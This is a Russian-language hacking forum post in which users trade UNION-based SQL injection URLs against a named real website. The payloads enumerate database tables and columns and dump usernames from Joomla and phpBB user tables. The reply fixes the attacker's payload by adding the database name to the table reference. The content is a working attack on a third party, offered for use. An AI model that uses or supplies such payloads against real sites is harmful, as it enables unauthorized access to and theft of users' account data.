Показать сообщение отдельно

  #6500  
Старый 28.08.2008, 18:19
nicusor
Участник форума
Регистрация: 19.03.2008
Сообщений: 108
С нами: 9550090

Репутация: 137
По умолчанию

Цитата:
Сообщение от SeNaP  
Список БД
http://www.devchatnik.ru/new/news.php?id=-12+union+select+1,2,3,4,table_name,6,7+from+inform ation_schema.tables/*

БД jos_users
http://www.devchatnik.ru/new/news.php?id=-12+union+select+1,2,3,4,column_name,6,7+from+infor mation_schema.columns+where+table_name=0x6a6f735f7 573657273/*
немогу данный просматреть

БД phpbb_users
http://www.devchatnik.ru/new/news.php?id=-12+union+select+1,2,3,4,column_name,6,7+from+infor mation_schema.columns+where+table_name=0x706870626 25f7573657273/*

И опять же не могу просмотреть
P.S я делаю вот так http://www.devchatnik.ru/new/news.php?id=-12+union+select+1,2,3,4,username,6,7+from+phpbb_us ers+limit+1,1--

Скажите в чем проблема?

http://www.devchatnik.ru/new/news.php?id=-12+union+select+1,2,3,username,5,6,7+from+db4514a. phpbb_users/*

нужно указывать и название базы
 
Ответить с цитированием